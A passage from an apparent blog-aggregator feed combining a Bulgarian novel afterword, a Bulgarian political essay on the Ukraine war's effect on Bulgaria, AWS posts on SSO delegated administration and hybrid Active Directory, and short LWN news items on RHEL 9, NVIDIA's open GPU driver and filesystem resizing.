Сингер е неизличима част от моето ДНК и от гените ми. Той ме свързва с мнозина от предците ми, особено с един мой чичо, но също и с баща ми. Първоначално възнамерявах да озаглавя романа „Божие дете“, но през 1999–2000 г. това заглавие ми се стори твърде ударно. Може би все пак е трябвало да изпълня първоначалното си намерение, при всички положения това заглавие би било точно. „Т. Сингер“ е по-сполучливо. Макар „Божие дете“ да е различно и по-запомнящо се, се радвам, че избрах „Т. Сингер“. То съхранява комплексността на романа по един по-анонимен начин.

Превод от норвежки Стефка Кожухарова

Заглавна илюстрация: Фрагмент от корицата на българското издание на „Т. Сингер“, дело на Росица Ралева

Източник

Войната в Украйна извади България от хибернацията

Post Syndicated from Емилия Милчева original https://toest.bg/voynata-v-ukrayna-izvadi-bulgariya-ot-hibernatsiyata/

България ще стане член на Европейския съюз и НАТО през 2022 г. Точно така, няма грешка. Българската държава пребиваваше в състояние на хибернация през всичките тези 15 години след присъединяването ѝ към европейската общност и 18 години от приемането ѝ в Алианса. Поглъщаше евросредства на порции – чрез създадените за целта кръжила от фирми, имитираше превъоръжаване чрез прескъпи договори за военна техника, но така, че руската да остане на въоръжение. В общи линии успя да си създаде имидж на консуматор на преките ползи от двата договора, на пасивен и ненадежден партньор и съюзник.

Войната в Украйна извади принудително от хибернацията българските управляващи, заставяйки ги не просто да изберат отбор, но и да играят в него. Правителството на четворната коалиция не беше готово за суровата реалност – ударите отвън и отвътре. На дневен ред излязоха проблеми, чиито решения не бяха системно и целенасочено търсени досега, като енергийната диверсификация; боеспособността на българската армия; кампанията относно еврозоната (предвид присъединяването от 1 януари 2024 г.); руската хибридна война като национална и европейска заплаха. Тук е и темата за българското вето за Северна Македония, с начертаните от по-рано червени линии в Договора за добросъседство от 2017 г. и грешката тя да бъде оставена „на концесия“ на ВМРО.

Руската агресия в Украйна принуди управляващите да търсят решения за поне част от проблемите, а решенията следва да са два типа – спешни и дългосрочни. Тези процеси са усложнени от непрекъснатите протести на различни браншове – превозвачи, пътни строители, собственици на заведения, полицаи, медицински сестри, местни общности, както и от бързия спад на доверие към управляващите още в края на първите 100 дни и ръста на подкрепата за националконсерватори с пропутински уклон. Наред с това държавните институции са отслабени от години и с традиционно ниско доверие, а върховенството на правото – унизено, което улеснява проникването на руската пропаганда предвид слабия национален имунитет.

Решенията обаче не минават през реформи нито в енергийния сектор, нито в секторите по сигурност и отбрана, нито в здравеопазването. По всичко личи, че е стопирана знаковата реформа в правосъдието – едно от основанията за управление на четирите партии. Правителството действа като изправен до стената човек с опрян в главата пистолет – готово е да обещае всичко всекиму. А обещаващите щедро задължават държавния бюджет с обещанията си. Предстои актуализацията му през юни и вицепремиерът и министър на финансите Асен Василев съобщи, че се подготвя пакет от антикризисни мерки на стойност 1,5–2 млрд. лв. А при мерките, както се оказва, засега цари пълен хаос – както за отстъпките за горивата, така и за евентуалните данъчни облекчения, преизчисляване на пенсии и др.

Енергийна диверсификация

Европейският съюз, а значи и България, слага началото на раздялата си с руските енергийни суровини. Колко време ще трае дългото сбогуване, е невъзможно да се прогнозира, независимо от обявения финал до 2030 г. да бъдат приключени доставките на руски природен газ, от август т.г. да се спре вносът на руски въглища, както и намерението за ембарго на петрола от Русия (засега осуетено). За най-бедната държава в ЕС, зависима над 85% от руския газ, 70% от петрола и 100% от руското ядрено гориво, това е тежък удар. Със свежо ядрено гориво двата работещи блока на АЕЦ „Козлодуй“ са осигурени в близките две до четири години – диверсификацията там начева с постепенната замяна на касети с гориво на американската „Уестингхаус“ от средата на 2024 г. А нерешеният проблем е липсата на „гробище“ за геологическо погребване на остъкления отпадък, който Русия трябва да ни връща.

Спрените от „Газпром“ доставки на руско синьо гориво за Полша и България през април – заради отказа на страните да плащат в рубли – поставиха управляващите пред необходимостта, първо, спешно да осигурят доставки до края на годината и второ, да подготвят пакет от решения, гарантиращи снабдяването с газ в дългосрочен план. В краткосрочен план изходът е втечнен газ и азерски газ, който обаче ще влиза в пълен обем в края на годината, когато е реалният срок за пускане в търговска експлоатация на интерконектора в Гърция. Правителството съобщи, че по време на посещението си в САЩ премиерът Кирил Петков е договорил „реални доставки на втечнен природен газ към България на цени под тези на „Газпром“, които да започнат от месец юни“. За последно цените на руския газ за България надхвърлиха $1000 за 1000 куб.м.

Но каквито и да са цените на новите доставки, ще бъдат платени. Хранилището в Чирен, сега почти празно, трябва да бъде запълнено преди началото на отоплителния сезон, а топлофикациите, индустриите, хлебозаводите, 150-те хиляди битови абонати, както и газифицираните общини трябва да продължат да получават суровината. Положението ще бъде някак закърпено, въпросът е как ще се договорят количества в дългосрочен план. Договорът с Азербайджан за доставки на 1 млрд. куб.м е 25-годишен, до 2045 г., и покрива една трета от българската консумация. Откъде ще се вземат останалите 2 млрд. куб.м, е въпрос на преговори отсега, но и на политическа воля в коалиция, в която единият от партньорите – БСП, смята Русия за „приятелска държава“. (Какво от това, че България е в кремълския списък на неприятелите?!)

Раздялата с руския петрол ще стане доста по-трудно (и) поради обявеното вече от вицепремиера Василев намерение за вето върху европейското решение за ембарго. В основата му е господстващото положение на „Лукойл“ на пазара за горива и при данъчните складове, а също и като основен доставчик за държавния резерв, в комбинация със страха на управляващите горивата да не поскъпнат значително, което ще взриви нови протести – и инфлация.

Съюзник в НАТО

Прословутият български батальон, за който ратуваха и президентът Румен Радев, и отстраненият военен министър и бивш негов съветник Стефан Янев, се оказа мултинационален. Към него се присъединяват американски, британски и италиански военни – 150 от Великобритания, толкова и от САЩ. Испански изтребители пристигнаха, за да охраняват българското небе. Какво направи България като партньор? Нула, освен декларативни изявления срещу агресора и в подкрепа на Украйна. Чуха се дори предложения за „пълен неутралитет“ (отново най-гласовити бяха от БСП и „Възраждане“) по отношение не просто на война, която руският агресор води за територия, но война срещу международния правов ред и европейските ценности.

На българската върховна власт, каквато е Народното събрание в парламентарна демокрация, обаче дори не му стискаше да гласува изпращане на военна помощ в Украйна и така еднозначно да покаже позиция, изразена вече от останалите държави в ЕС (без Унгария). По този начин се стигна до военнотехническа помощ, при това конкретно упомената – ремонт на военна техника, ако и когато Украйна поиска.

Впрочем в годините назад като че ли българската армия проявяваше повече активност. Мисията в Афганистан например започна още преди НАТО, през 2002 г., когато българският военен контингент се включи в Международните сили за поддържане на сигурността, а след 2005 г. – вече като част от операцията на НАТО „Решителна подкрепа“. Що се отнася до американската операция в Ирак през 2003 г., правителството на НДСВ–ДПС обяви малко преди това, че ще действа като „фактически член на НАТО“. И досущ като британския премиер Тони Блеър – в името на „особените отношения“ със САЩ, се включи в инвазия, чието начало бе аргументирано с лъжа – че режимът на Саддам Хюсеин създава оръжия за масово поразяване.

Как настоящото управление ще разреши основния въпрос – партньор ли е България в ЕС и НАТО, или снишен наблюдател, ще определи по-нататъшното бъдеще. Ако ще позволи на страха и Корнелия Нинова да диктуват условия, по-добре да се разчетворят още отсега. Възможно е избирателите да оценят по достойнство тази смелост. Аргументът, че оставката би отворила път за „Български възход“ на Стефан Янев и „Възраждане“ на Костадин Костадинов, не са състоятелни, ако ще ни предложат съглашателство в името на същото като сега.

Излизането от хибернацията ще е мъчително. България, която е интегрирана със Запада, чиито деца избират да учат на Запад, чиито мозъци изтичат на Запад, чиито гастарбайтери отиват да работят на Запад, още чака чорбаджи Марко да събере фамилията на вечеря, а чорбаджи Мичо Бейзадето да тропне по масата, че Русия не може да се победи. Време е да се излиза от хибернацията – XXI век е.

Заглавна снимка: © Пресцентър на Министерския съвет

Източник

Getting started with AWS SSO delegated administration

Post Syndicated from Chris Mercer original https://aws.amazon.com/blogs/security/getting-started-with-aws-sso-delegated-administration/

Recently, AWS launched the ability to delegate administration of AWS Single Sign-On (AWS SSO) in your AWS Organizations organization to a member account (an account other than the management account). This post will show you a practical approach to using this new feature. For the documentation for this feature, see Delegated administration in the AWS Single Sign-On User Guide.

With AWS Organizations, your enterprise organization can manage your accounts more securely and at scale. One of the benefits of Organizations is that it integrates with many other AWS services, so you can centrally manage accounts and how the services in those accounts can be used.

AWS SSO is where you can create, or connect, your workforce identities in AWS just once, and then manage access centrally across your AWS organization. You can create user identities directly in AWS SSO, or you can bring them from your Microsoft Active Directory or a standards-based identity provider, such as Okta Universal Directory or Azure AD. With AWS SSO, you get a unified administration experience to define, customize, and assign fine-grained access.

By default, the management account in an AWS organization has the power and authority to manage member accounts in the organization. Because of these additional permissions, it is important to exercise least privilege and tightly control access to the management account. AWS recommends that enterprises create one or more accounts specifically designated for security of the organization, with proper controls and access management policies in place. AWS provides a method in which many services can be administered for the organization from a member account; this is usually referred to as a delegated administrator account. These accounts can reside in a security organizational unit (OU), where administrators can enforce organizational policies. Figure 1 is an example of a recommended set of OUs in Organizations.

Figure 1: Recommended AWS Organizations OUs

Figure 1: Recommended AWS Organizations OUs

Many AWS services support this delegated administrator model, including Amazon GuardDuty, AWS Security Hub, and Amazon Macie. For an up-to-date complete list, see AWS services that you can use with AWS Organizations. AWS SSO is now the most recent addition to the list of services in which you can delegate administration of your users, groups, and permissions, including third-party applications, to a member account of your organization.

How to configure a delegated administrator account

In this scenario, your enterprise AnyCompany has an organization consisting of a management account, an account for managing security, as well as a few member accounts. You have enabled AWS SSO in the organization, but you want to enable the security team to manage permissions for accounts and roles in the organization. AnyCompany doesn’t want you to give the security team access to the management account, and they also want to make sure the security team can’t delete the AWS SSO configuration or manage access to that account, so you decide to delegate the administration of AWS SSO to the security account.

Note: There are a few things to consider when making this change, which you should review before you enable delegated administration. These items are covered in the console during the process, and are described in the section Considerations when delegating AWS SSO administration in this post.

To delegate AWS SSO administration to a security account

  1. In the AWS Organizations console, log in to the management account with a user or role that has permission to use organizations:RegisterDelegatedAdministrator, as well as AWS SSO management permissions.
  2. In the AWS SSO console, navigate to the Region in which AWS SSO is enabled.
  3. Choose Settings on the left navigation pane, and then choose the Management tab on the right side.
  4. Under Delegated administrator, choose Register account, as shown in Figure 2.
    Figure 2: The registered account button in AWS SSO

    Figure 2: The Register account button in AWS SSO

  5. Consider the implications of designating a delegated administrator account (as described in the section Considerations when delegating AWS SSO administration). Select the account you want to be able to manage AWS SSO, and then choose Register account, as shown in Figure 3.
    Figure 3: Choosing a delegated administrator account in AWS SSO

    Figure 3: Choosing a delegated administrator account in AWS SSO

You should see a success message to indicate that the AWS SSO delegated administrator account is now setup.

To remove delegated AWS SSO administration from an account

  1. In the AWS Organizations console, log in to the management account with a user or role that has permission to use organizations:DeregisterDelegatedAdministrator.
  2. In the AWS SSO console, navigate to the Region in which AWS SSO is enabled.
  3. Choose Settings on the left navigation pane, and then choose the Management tab on the right side.
  4. Under Delegated administrator, select Deregister account, as shown in Figure 4.
    Figure 4: The Deregister account button in AWS SSO

    Figure 4: The Deregister account button in AWS SSO

  5. Consider the implications of removing a delegated administrator account (as described in the section Considerations when delegating AWS SSO administration), then enter the account name that is currently administering AWS SSO, and choose Deregister account, as shown in Figure 5.
    Figure 5: Considerations of deregistering a delegated administrator in AWS SSO

    Figure 5: Considerations of deregistering a delegated administrator in AWS SSO

Considerations when delegating AWS SSO administration

There are a few considerations you should keep in mind when you delegate AWS SSO administration. The first consideration is that the delegated administrator account will not be able to perform the following actions:

  • Delete the AWS SSO configuration.
  • Delegate (to other accounts) administration of AWS SSO.
  • Manage user or group access to the management account.
  • Manage permission sets that are provisioned (have a user or group assigned) in the organization management account.

For examples of those last two actions, consider the following scenarios:

In the first scenario, you are managing AWS SSO from the delegated administrator account. You would like to give your colleague Saanvi access to all the accounts in the organization, including the management account. This action would not be allowed, since the delegated administrator account cannot manage access to the management account. You would need to log in to the management account (with a user or role that has proper permissions) to provision that access.

In a second scenario, you would like to change the permissions Paulo has in the management account by modifying the policy attached to a ManagementAccountAdmin permission set, which Paulo currently has access to. In this scenario, you would also have to do this from inside the management account, since the delegated administrator account does not have permissions to modify the permission set, because it is provisioned to a user in the management account.

With those caveats in mind, users with proper access in the delegated administrator account will be able to control permissions and assignments for users and groups throughout the AWS organization. For more information about limiting that control, see Allow a user to administer AWS SSO for specific accounts in the AWS Single Sign-On User Guide.

Deregistering an AWS SSO delegated administrator account will not affect any permissions or assignments in AWS SSO, but it will remove the ability for users in the delegated account to manage AWS SSO from that account.

Additional considerations if you use Microsoft Active Directory

There are additional considerations for you to keep in mind if you use Microsoft Active Directory (AD) as an identity provider, specifically if you use AWS SSO configurable AD sync, and which AWS account the directory resides in. In order to use AWS SSO delegated administration when the identity source is set to Active Directory, AWS SSO configurable AD sync must be enabled for the directory. Your organization’s administrators must synchronize Active Directory users and groups you want to grant access to into an AWS SSO identity store. When you enable AWS SSO configurable AD sync, a new feature that launched in April, Active Directory administrators can choose which users and groups get synced into AWS SSO, similar to how other external identity providers work today when using the System for Cross-domain Identity Management (SCIM) v2.0 protocol. This way, AWS SSO knows about users and groups even before they are granted access to specific accounts or roles, and AWS SSO administrators don’t have to manually search for them.

Another thing to consider when delegating AWS SSO administration when using AD as an identity source is where your directory resides, that is which AWS account owns the directory. If you decide to change the AWS SSO identity source from any other source to Active Directory, or change it from Active Directory to any other source, then the directory must reside in (be owned by) the account that the change is being performed in. For example, if you are currently signed in to the management account, you can only change the identity source to or from directories that reside in (are owned by) the management account. For more information, see Manage your identity source in the AWS Single Sign-On User Guide.

Best practices for managing AWS SSO with delegated administration

AWS recommends the following best practices when using delegated administration for AWS SSO:

  • Maintain separate permission sets for use in the organization management account (versus the rest of the accounts). This way, permissions can be kept separate and managed from within the management account without causing confusion among the delegated administrators.
  • When granting access to the organization management account, grant the access to groups (and permission sets) specifically for access in that account. This helps enable the principal of least privilege for this important account, and helps ensure that AWS SSO delegated administrators are able to manage the rest of the organization as efficiently as possible (by reducing the number of users, groups, and permission sets that are off limits to them).
  • If you plan on using one of the AWS Directory Services for Microsoft Active Directory (AWS Managed Microsoft AD or AD Connector) as your AWS SSO identity source, locate the directory and the AWS SSO delegated administrator account in the same AWS account.

Conclusion

In this post, you learned about a helpful new feature of AWS SSO, the ability to delegate administration of your users and permissions to a member account of your organization. AWS recommends as a best practice that the management account of an AWS organization be secured by a least privilege access model, in which as few people as possible have access to the account. You can enable delegated administration for supported AWS services, including AWS SSO, as a useful tool to help your organization minimize access to the management account by moving that control into an AWS account designated specifically for security or identity services. We encourage you to consider AWS SSO delegated administration for administrating access in AWS. To learn more about the new feature, see Delegated administration in the AWS Single Sign-On User Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS IAM forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Chris Mercer

Chris is a security specialist solutions architect. He helps AWS customers implement sophisticated, scalable, and secure solutions to business challenges. He has experience in penetration testing, security architecture, and running military IT systems and networks. Chris holds a Master’s Degree in Cybersecurity, several AWS certifications, OSCP, and CISSP. Outside of AWS, he is a professor, student pilot, and Cub Scout leader.

Red Hat Enterprise Linux 9 released

Post Syndicated from original https://lwn.net/Articles/894869/

On May 10, Red Hat announced the release of Red Hat Enterprise Linux 9 (RHEL 9). Not surprisingly, the announcement is rather buzzword-heavy and full of marketing, though there are some technical details scattered in it. The release notes for the RHEL 9 beta are available, which have a lot more information. “The platform will be generally available in the coming weeks.

Building on decades of relentless innovation, the latest version of the world’s leading enterprise Linux platform is the first production release built from CentOS Stream, the continuously delivered Linux distribution that tracks just ahead of Red Hat Enterprise Linux. This approach helps the broader Red Hat Enterprise Linux ecosystem, from partners to customers to independent users, provide feedback, code and feature updates to the world’s leading enterprise Linux platform.

NVIDIA Transitioning To Official, Open-Source Linux GPU Kernel Driver (Phoronix)

Post Syndicated from original https://lwn.net/Articles/894861/

Phoronix reports
that the days of proprietary NVIDIA graphics drivers are coming to a close.

NVIDIA’s open kernel modules is already considered “production
ready, opt-in” for data center GPUs. For GeForce and workstation
GPUs, the open kernel module code is considered “alpha quality” but
will be ramped up moving forward with future releases. NVIDIA has
already deprecated the monolithic kernel module approach for their
data center GPU support to focus on this open kernel driver
solution (and their existing proprietary kernel module using the
GSP). Only Turing and newer GPUs will be supported by this
open-source kernel driver. Pre-Turing GPUs are left to using the
existing proprietary kernel drivers or the Nouveau DRM driver for
that matter.

The user-space code remains proprietary, though, which could inhibit the
eventual merging of this code into the mainline kernel.

Update: here is NVIDIA’s
press release
on the new drivers.

[$] Changing filesystem resize patterns

Post Syndicated from original https://lwn.net/Articles/894629/

In a filesystem session at the
2022 Linux Storage,
Filesystem, Memory-management and BPF Summit
(LSFMM), Ted Ts’o brought
up the subject of filesystems that get resized frequently and whether the
default parameters for filesystem creation should change as a result. It
stems from a conversation that he had with XFS developer Darrick
Wong, who is experiencing some the same challenges as ext4 in this area.
He outlined the problem and how it comes about, then led the discussion on
ways to perhaps address it.

Running hybrid Active Directory service with AWS Managed Microsoft Active Directory

Post Syndicated from Lewis Tang original https://aws.amazon.com/blogs/architecture/running-hybrid-active-directory-service-with-aws-managed-microsoft-active-directory/

Enterprise customers often need to architect a hybrid Active Directory solution to support running applications in the existing on-premises corporate data centers and AWS cloud. There are many reasons for this, such as maintaining the integration with on-premises legacy applications, keeping the control of infrastructure resources, and meeting with specific industry compliance requirements.

To extend on-premises Active Directory environments to AWS, some customers choose to deploy Active Directory service on self-managed Amazon Elastic Compute Cloud (EC2) instances after setting up connectivity for both environments. This setup works fine, but it also presents management and operations challenges when it comes to EC2 instance operation management, Windows operating system, and Active Directory service patching and backup. This is where AWS Directory Service for Microsoft Active Directory (AWS Managed Microsoft AD) helps.

Benefits of using AWS Managed Microsoft AD

With AWS Managed Microsoft AD, you can launch an AWS-managed directory in the cloud, leveraging the scalability and high availability of an enterprise directory service while adding seamless integration into other AWS services.

In addition, you can still access AWS Managed Microsoft AD using existing administrative tools and techniques, such as delegating administrative permissions to select groups in your organization. The full list of permissions that can be delegated is described in the AWS Directory Service Administration Guide.

Active Directory service design consideration with a single AWS account

Single region

A single AWS account is where the journey begins: a simple use case might be when you need to deploy a new solution in the cloud from scratch (Figure 1).

A single AWS account and single-region model

Figure 1. A single AWS account and single-region model

In a single AWS account and single-region model, the on-premises Active Directory has “company.com” domain configured in the on-premises data center. AWS Managed Microsoft AD is set up across two availability zones in the AWS region for high availability. It has a single domain, “na.company.com”, configured. The on-premises Active Directory is configured to trust the AWS Managed Microsoft AD with network connectivity via AWS Direct Connect or VPN. Applications that are Active-Directory–aware and run on EC2 instances have joined na.company.com domain, as do the selected AWS managed services (for example, Amazon Relational Database Service for SQL server).

Multi-region

As your cloud footprint expands to more AWS regions, you have two options also to expand AWS Managed Microsoft AD, depending on which edition of AWS Managed Microsoft AD is used (Figure 2):

  1. With AWS Managed Microsoft AD Enterprise Edition, you can turn on the multi-region replication feature to configure automatically inter-regional networking connectivity, deploy domain controllers, and replicate all the Active Directory data across multiple regions. This ensures that Active-Directory–aware workloads residing in those regions can connect to and use AWS Managed Microsoft AD with low latency and high performance.
  2. With AWS Managed Microsoft AD Standard Edition, you will need to add a domain by creating independent AWS Managed Microsoft AD directories per-region. In Figure 2, “eu.company.com” domain is added, and AWS Transit Gateway routes traffic among Active-Directory–aware applications within two AWS regions. The on-premises Active Directory is configured to trust the AWS Managed Microsoft AD, either by Direct Connect or VPN.
A single AWS account and multi-region model

Figure 2. A single AWS account and multi-region model

Active Directory Service Design consideration with multiple AWS accounts

Large organizations use multiple AWS accounts for administrative delegation and billing purposes. This is commonly implemented through AWS Control Tower service or AWS Control Tower landing zone solution.

Single region

You can share a single AWS Managed Microsoft AD with multiple AWS accounts within one AWS region. This capability makes it simpler and more cost-effective to manage Active-Directory–aware workloads from a single directory across accounts and Amazon Virtual Private Cloud (VPC). This option also allows you seamlessly join your EC2 instances for Windows to AWS Managed Microsoft AD.

As a best practice, place AWS Managed Microsoft AD in a separate AWS account, with limited administrator access but sharing the service with other AWS accounts. After sharing the service and configuring routing, Active Directory aware applications, such as Microsoft SharePoint, can seamlessly join Active Directory Domain Services and maintain control of all administrative tasks. Find more details on sharing AWS Managed Microsoft AD in the Share your AWS Managed AD directory tutorial.

Multi-region

With multiple AWS Accounts and multiple–AWS-regions model, we recommend using AWS Managed Microsoft AD Enterprise Edition. In Figure 3, AWS Managed Microsoft AD Enterprise Edition supports automating multi-region replication in all AWS regions where AWS Managed Microsoft AD is available. In AWS Managed Microsoft AD multi-region replication, Active-Directory–aware applications use the local directory for high performance but remain multi-region for high resiliency.

Multiple AWS accounts and multi-region model

Figure 3. Multiple AWS accounts and multi-region model

Domain Name System resolution design

To enable Active-Directory–aware applications communicate between your on-premises data centers and the AWS cloud, a reliable solution for Domain Name System (DNS) resolution is needed. You can set the Amazon VPC Dynamic Host Configuration Protocol (DHCP) option sets to either AWS Managed Microsoft AD or on-premises Active Directory; then, assign it to each VPC in which the required Active-Directory–aware applications reside. The full list of options working with DHCP option sets is described in Amazon Virtual Private Cloud User Guide.

The benefit of configuring DHCP option sets is to allow any EC2 instances in that VPC to resolve their domain names by pointing to the specified domain and DNS servers. This prevents the need for manual configuration of DNS on EC2 instances. However, because DHCP option sets cannot be shared across AWS accounts, this requires a DHCP option sets also to be created in additional accounts.

DHCP option sets

Figure 4. DHCP option sets

An alternative option is creating an Amazon Route 53 Resolver. This allows customers to leverage Amazon-provided DNS and Route 53 Resolver endpoints to forward a DNS query to the on-premises Active Directory or AWS Managed Microsoft AD. This is ideal for multi-account setups and customers desiring hub/spoke DNS management.

This alternative solution replaces the need to create and manage EC2 instances running as DNS forwarders with a managed and scalable solution, as Route 53 Resolver forwarding rules can be shared with other AWS accounts. Figure 5 demonstrates a Route 53 resolver forwarding a DNS query to on-premises Active Directory.

Route 53 Resolver

Figure 5. Route 53 Resolver

Conclusion

In this post, we described the benefits of using AWS Managed Microsoft AD to integrate with on-premises Active Directory. We also discussed a range of design considerations to explore when architecting hybrid Active Directory service with AWS Managed Microsoft AD. Different design scenarios were reviewed, from a single AWS account and region, to multiple AWS accounts and multi-regions. We have also discussed choosing between the Amazon VPC DHCP option sets and Route 53 Resolver for DNS resolution.

Further reading

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close